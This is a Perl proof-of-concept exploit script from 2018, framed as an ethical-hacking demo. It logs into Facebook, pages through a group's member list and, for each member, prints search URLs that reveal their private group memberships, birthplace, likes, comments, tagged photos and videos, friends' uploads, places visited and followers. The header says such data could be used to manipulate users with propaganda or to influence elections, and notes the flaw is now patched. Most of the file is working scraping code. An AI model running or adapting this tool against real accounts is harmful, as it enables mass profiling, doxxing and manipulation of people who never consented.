#!/usr/bin/perl # # Facebook (facebug) 'Graph' Groups crosswalk user's # metadata mapping weakness (Demo PoC) # # # 2018 Todor Donev <todor.donev at gmail.com> # https://ethical-hacker.org/ # https://facebook.com/ethicalhackerorg # # Description: # Criminal hacker (CRACKER) can take advantage of # this weakness by creating a specialized database # to manipulate the humans (facebook users) with # fake news, misinformation, propaganda or influence # elections. # # See Also: # https://en.wikipedia.org/wiki/Schema_crosswalk # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # # Requirements: # cpan install HTTP::Cookies # cpan install WWW::Mechanize # # # I know that is buggy but is only conceptual tool # which demonstrate exploitation of this weakness. # # # Facebook answer: # Hi Todor, # # Thank you for contacting us. Unfortunately what # you have described is not currently covered by # this program. Please see # https://www.facebook.com/data-abuse/terms/ for # more information about what is currently in scope # of this program. We will follow up with you # regarding any questions we may have. For any other # questions or concerns, please visit our Help Center: # https://www.facebook.com/help. # # Thanks, # # Amber Serrano # Developer Operations # # Data Abuse Bounty is useless when this door is widely # opened for criminal abusing. # # Now this weakness is patched.. # # Buggy, Buggy, Buggy.. :) # use strict; use WWW::Mechanize; use HTTP::Cookies; use open ':std', ':encoding(UTF-8)'; my $un = ''; # facebook login my $pw = ''; # facebook password print "Facebook (facebug) \'Graph\' Groups crosswalk metadata mapping weakness (Demo PoC)\n"; print "[ Website: https://ethical-hacker.org\n"; print "[ Author: Todor Donev <todor.donev at gmail.com>\n"; die "Usage: perl $0 <Group ID>\n" unless (scalar @ARGV)==1; my $mech = WWW::Mechanize->new();$mech->cookie_jar(HTTP::Cookies->new()); $mech->agent_alias('Linux Mozilla'); $mech->get("http://m.facebook.com/login.php"); $mech->submit_form(form_number => 1,fields =>{email=>$un,pass=>$pw}); die "Error: $! \n" if !$mech->content() =~ /post_form_id\"\svalue=\"(\w+)\"/; foreach my $gid (@ARGV){ $mech->get("https://m.facebook.com/browse/group/members/?id=$gid"); printf "$1 " if ($mech->content() =~ m/<title>(.*)<\/title>/g); for (my $j = 0; $j <= 100000; $j += 30){ $mech->get("https://m.facebook.com/browse/group/members/?id=$gid&start=$j&listType=list_general"); die "[ No results found\n[\n[ ==========================\n" if (($mech->content() =~ m{Content Not Found}) or ($mech->content() =~ m{No results found.})); if (my @profiles = ($mech->content() =~ m/<div><h3><a href="\/(.*?)">(.*?)<\/a><\/h3>/g)){ if (my @userid = ($mech->content() =~ m/id="member_(.*?)">/g)){ while (@profiles || @userid) { my $fburl = shift @profiles; my $name = shift @profiles; my $pid = shift @userid; printf "\x1b\x5b0;32m[\x1b\x5b0m User ID: \x1b\x5b0;35m $pid \x1b\x5b0m Name/Profile: \x1b\x5b1;36m $name \x1b\x5b0m \x1b\x5b1;31m=>\x1b\x5b0m https://www.facebook.com/\x1b\x5b0;36m$fburl \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Which facebook groups the person joined:\x1b\x5b0;33m https://www.facebook.com/search/$pid/groups \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Which private facebook groups the person joined:\x1b\x5b0;33m https://www.facebook.com/search/$pid/groups-privacy \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Where the person is bornd:\x1b\x5b0;33m https://www.facebook.com/search/$pid/users-birth-place \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person commented on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-commented \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-liked \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m In which posts is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-tagged \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Posts by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-by \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Photos maded by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-by \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-in \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Which photos does this person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-liked \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Photos made of this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-of \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m In which photos is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-tagged \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the person comment on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-commented \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the friends upload:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-uploaded \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the friends tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-tagged \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m What photos maded by the person's friends:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-of \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Photos by the person's friends:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-by \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Videos made of this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-of \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Videos maded by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-by \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m In which videos is this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-in \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Which videos does this person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-liked \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m In which videos is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-tagged \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m What videos did the person comment on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-commented \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m What videos did the friends upload:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/videos-uploaded \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m All visited places:\x1b\x5b0;33m https://www.facebook.com/search/$pid/places-visited \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m Which people are following:\x1b\x5b0;33m https://m.facebook.com/subscribe/lists/?id=$pid \x1b\x5b0m\n"; printf "\x1b\x5b0;32m[\x1b\x5b0m \n"; } } } } }